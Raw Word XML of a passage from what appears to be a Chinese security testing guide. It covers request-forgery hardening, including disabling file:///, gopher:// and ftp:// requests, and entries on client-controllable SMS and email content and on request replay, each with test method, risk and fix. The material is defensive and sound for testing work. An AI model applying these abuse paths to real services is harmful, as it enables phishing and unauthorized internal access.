      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则停止将返回信息返回客户端。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2767DF53" w14:textId="77777777" w:rsidR="005C6098" w:rsidRPr="009910AE" w:rsidRDefault="005C6098" w:rsidP="009910AE">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>统一错误提示信息，避免用户可以根据错误信息来判断远端服务器的端口状态。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EF38E9" w14:textId="77777777" w:rsidR="005C6098" w:rsidRPr="009910AE" w:rsidRDefault="005C6098" w:rsidP="009910AE">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在内网服务器的防火墙上限制公网服务器的请求端口为</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等协议常用端口，如：</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>443</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8080</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8090</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3267209B" w14:textId="77777777" w:rsidR="005C6098" w:rsidRPr="009910AE" w:rsidRDefault="005C6098" w:rsidP="009910AE">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若公网服务器的内网</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与内网无业务通信，建议将公网服务器对应的内网</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列入黑名单，避免应用被用来获取内网数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6006CB77" w14:textId="0D7832C3" w:rsidR="009145B3" w:rsidRDefault="005C6098" w:rsidP="009910AE">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内网服务器禁用不必要的协议，仅允许</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求，防止类似于</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>file:///</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gopher://</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp:// </w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等协议引起的安全问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A527DE7" w14:textId="20F527B0" w:rsidR="000C0F87" w:rsidRPr="009910AE" w:rsidRDefault="000C0F87" w:rsidP="000C0F87">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AF25636" w14:textId="09B4AE96" w:rsidR="009145B3" w:rsidRPr="00A82BA3" w:rsidRDefault="00295723" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc498434520"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>短信内容可控</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="30451C8D" w14:textId="5FFC5053"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00203EED" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>短信内容可从客户端指定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5264794D" w14:textId="0055E9FA"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测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00CB5BF0" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在客户端编辑任意短信内容，测试是否过滤特殊内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3905BD4F" w14:textId="583832ED" w:rsidR="009145B3" w:rsidRPr="009910AE" w:rsidRDefault="00C24790" w:rsidP="009910AE">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="009145B3" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00CB5BF0" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可利用该漏洞，借助短信平台，编辑钓鱼短信发送给其他用户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3C5E09" w14:textId="77777777"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B50C11" w14:textId="033B4468" w:rsidR="003054C2" w:rsidRPr="009910AE" w:rsidRDefault="003054C2" w:rsidP="009910AE">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00DA7BE8" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>短信内容可控，且接收人可任意指定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F04D0C" w14:textId="3DF7E057" w:rsidR="009145B3" w:rsidRPr="009910AE" w:rsidRDefault="003054C2" w:rsidP="009910AE">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00DA7BE8" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>短信内容可控，但接受人不可控</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5F0B28" w14:textId="3DDE32CF" w:rsidR="009145B3" w:rsidRDefault="009145B3" w:rsidP="009910AE">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00FF0B2E" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议在不影响业务的前提下，</w:t>
      </w:r>
      <w:r w:rsidR="00E125F3" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁止客户端编辑短信</w:t>
      </w:r>
      <w:r w:rsidR="00E13744" w:rsidRPr="009910AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7800600E" w14:textId="32440FCF" w:rsidR="000C0F87" w:rsidRPr="009910AE" w:rsidRDefault="000C0F87" w:rsidP="009910AE">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6C4554D" w14:textId="38EFE0A1" w:rsidR="009145B3" w:rsidRPr="00A82BA3" w:rsidRDefault="000703F3" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc498434521"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>邮件内容可控</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="0F5134DC" w14:textId="37108705" w:rsidR="009145B3" w:rsidRPr="00317390" w:rsidRDefault="009145B3" w:rsidP="00317390">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00317390">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00A153C5" w:rsidRPr="00317390">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用系统发送邮件的邮件内容可由客户端任意指定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08354DFD" w14:textId="3C3875DB" w:rsidR="009145B3" w:rsidRPr="00317390" w:rsidRDefault="009145B3" w:rsidP="00317390">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00317390">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="004F45F6" w:rsidRPr="00317390">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在客户端编辑任意邮件内容，测试是否过滤特殊内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAA1830" w14:textId="31CE67CC" w:rsidR="009145B3" w:rsidRPr="00317390" w:rsidRDefault="00C24790" w:rsidP="00317390">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00317390">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="009145B3" w:rsidRPr="00317390">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="004F45F6" w:rsidRPr="00317390">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可利用该漏洞，借助邮件平台，编辑钓鱼邮件发送给其他用户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6EBC61" w14:textId="77777777" w:rsidR="009145B3" w:rsidRPr="00317390" w:rsidRDefault="009145B3" w:rsidP="00317390">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00317390">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3D28E3" w14:textId="77777777" w:rsidR="00AB63B1" w:rsidRPr="00317390" w:rsidRDefault="00473CBD" w:rsidP="00317390">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00317390">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00317390">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00317390">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00317390">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00AB63B1" w:rsidRPr="00317390">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮件内容可控，且收件人可任意指定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7791ED54" w14:textId="12D36D44" w:rsidR="00473CBD" w:rsidRPr="00317390" w:rsidRDefault="00473CBD" w:rsidP="00317390">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00317390">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00317390">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="00317390">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00317390">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00AB63B1" w:rsidRPr="00317390">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮件内容可控，但收件人地址不可控</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7129418B" w14:textId="5F13E5FD" w:rsidR="009145B3" w:rsidRDefault="009145B3" w:rsidP="00317390">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00317390">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="004F45F6" w:rsidRPr="00317390">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议在不影响业务的前提下，禁止客户端编辑邮件内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781F3E54" w14:textId="213176B5" w:rsidR="000C0F87" w:rsidRPr="00317390" w:rsidRDefault="000C0F87" w:rsidP="00317390">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C1C4073" w14:textId="0B0E417E" w:rsidR="009145B3" w:rsidRPr="00A82BA3" w:rsidRDefault="00377DC8" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc498434522"/>
      <w:r w:rsidRPr="00A82BA3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求重放攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="6AD1F261" w14:textId="1128EEB4" w:rsidR="009145B3" w:rsidRPr="00E0174D" w:rsidRDefault="009145B3" w:rsidP="00E0174D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E0174D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="000412E7" w:rsidRPr="00E0174D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键业务操作未作</w:t>
      </w:r>
      <w:r w:rsidR="000412E7" w:rsidRPr="00E0174D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidR="000412E7" w:rsidRPr="00E0174D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者唯一标识码，导致攻击者可以重复多次进行请求，导致恶意操作。如重复交易等问题。</w:t>
      </w:r>
    </w:p>
